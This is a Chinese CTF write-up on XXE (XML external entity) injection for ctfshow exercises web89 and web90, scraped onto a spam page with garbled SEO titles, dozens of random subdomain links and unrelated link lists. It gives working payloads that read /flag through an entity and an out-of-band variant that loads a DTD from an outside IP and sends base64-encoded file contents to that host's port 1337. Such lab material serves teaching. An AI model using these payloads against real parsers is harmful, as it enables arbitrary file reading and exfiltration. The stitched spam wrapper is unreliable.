当前位置: 首页 > wzjs >正文

深圳网站建设创造者开锁做网站怎么样

深圳网站建设创造者,开锁做网站怎么样,网站对企业的重要性,wordpress模板修改教程XML中关于DTD类型(内部(SYSTEM)的和外部(PUBLIC)的区别) xxe的利用 XML Entity 实体注入 当程序处理xml文件时,没有禁止对外部实体的处理,容易造成xxe漏洞 危害 主流是任意文件读取 XML 文件 一般表示带有结构的数据 祖父 3个叔父 8个堂弟堂妹 …

XML中关于DTD类型(内部(SYSTEM)的和外部(PUBLIC)的区别)

xxe的利用


XML Entity 实体注入

当程序处理xml文件时,没有禁止对外部实体的处理,容易造成xxe漏洞

危害

主流是任意文件读取

XML 文件

一般表示带有结构的数据

祖父  3个叔父  8个堂弟堂妹   

<祖父>

    <叔父1>
        <堂兄1>
    </叔父1>

    <叔父2>
     <堂兄2>    
    </叔父2>

    <叔父3>

     <堂兄3>
    </叔父4>

</祖父>

xml格式


1 有回显时文件读取方法


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hacker[
    <!ENTITY hacker SYSTEM "file:///flag">
]> 

<root>
    <ctfshow>
        &hacker;
    </ctfshow>
</root>

例题1 web89

post传:

<?xml version="1.0" encoding="UTF-8"?><root><ctfshow>hacker</ctfshow>
</root>

看到回显hacker

可以实现任意文件回显

payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hacker[<!ENTITY hacker SYSTEM "file:///flag">
]> <root><ctfshow>&hacker;</ctfshow>
</root>

 这里文件名纯靠猜,文件读取是建立在文件名已知的基础上的

2 无回显时文件读取方法

例题2 web90

 无回显点,考虑数据外带

 post传

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hacker[
    <!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY  % myurl SYSTEM "http://124.222.136.33/test.dtd">
    %myurl;
]> 
<root>
1
</root>

在vps上创建文件test.dtd

test.dtd内容

<!ENTITY % dtd "<!ENTITY &#x25; vps SYSTEM 'http://124.222.136.33:1337/%file;'> ">
%dtd;
%vps;

vps监听1337端口即可


文章转载自:

http://xzk60Hk8.hytqt.cn
http://sAQuQKxb.hytqt.cn
http://pD1n6e1y.hytqt.cn
http://31eaydun.hytqt.cn
http://WsD8VhNO.hytqt.cn
http://UyW4WvHL.hytqt.cn
http://IZHgnxfV.hytqt.cn
http://77Zm7S1l.hytqt.cn
http://EQwGMpAh.hytqt.cn
http://H405rum0.hytqt.cn
http://3PSWDAfR.hytqt.cn
http://SM9BjaUT.hytqt.cn
http://lBNOcMZG.hytqt.cn
http://YEd4YXoc.hytqt.cn
http://aZU9g2XG.hytqt.cn
http://HuRpugfO.hytqt.cn
http://APZAVyQg.hytqt.cn
http://Gt9rg274.hytqt.cn
http://OCANE1nS.hytqt.cn
http://u3XuT6DH.hytqt.cn
http://tnQsmwVO.hytqt.cn
http://l1Bnf2KR.hytqt.cn
http://wJpvswI8.hytqt.cn
http://8KnUcUS0.hytqt.cn
http://kO9v4vMz.hytqt.cn
http://qOlktvgb.hytqt.cn
http://q5BeTbxN.hytqt.cn
http://ZDClL18z.hytqt.cn
http://5UpTgEXP.hytqt.cn
http://MYT9Xhky.hytqt.cn
http://www.dtcms.com/wzjs/625812.html

相关文章:

  • 深圳前十网站扩广公司wordpress5.2安装教程
  • 建网站卖北京设计公司招聘信息
  • p图做网站兼职微信端怎么建设网站
  • 网站开发连接效果大气宽屏网站模板
  • 网站开发流程 ppt深圳苏州企业网站建设服务商
  • 西安专业建网站中铁建设集团有限公司地址
  • 关键词与网站标题怎么看一个网站用什么平台做的
  • 建立什么网站赚钱山水装饰装修公司怎么样
  • 网站怎么做导航栏网页模板怎么做网站
  • 网站模板 作业做鞋子的网站
  • 百度联盟怎么做网站加入简述电子商务网站开发的研究意义
  • cms网站内容管理系统wordpress编辑文章手机版
  • 网站制作的地方wordpress文章文字连接
  • 普陀区网站建设邵阳县网络推广
  • 网站建设与管理的就业方向凡客诚品是什么平台
  • 做网站分辨率设置多少做旅行网站
  • 网站做优化的好处仿百度 wordpress
  • 什么身一什么网站建设白山网站seo
  • 宜昌百度网站建设龙口网站设计
  • 商城网站商家入驻功能学建网站
  • 易语言做网站简单教程抖音里做我女朋友网站
  • 网站怎么做qq授权登录界面音乐培训如何做网站宣传
  • 阿里云要求的网站建设方案晋江网站开发
  • 建筑公司财务做账流程电商网站如何做seo
  • 网站模板建站教程最成功的网络营销案例
  • 网站建设服务合同书泰州网站关键词优化
  • 网站建设新零售安全教育平台登录入口 登录
  • 网站建设行业网站漯河网站建设茂睿科技
  • 吴江区城乡建设局网站大美工设计网站官网
  • 建设网站的公司哪家好5118网站查询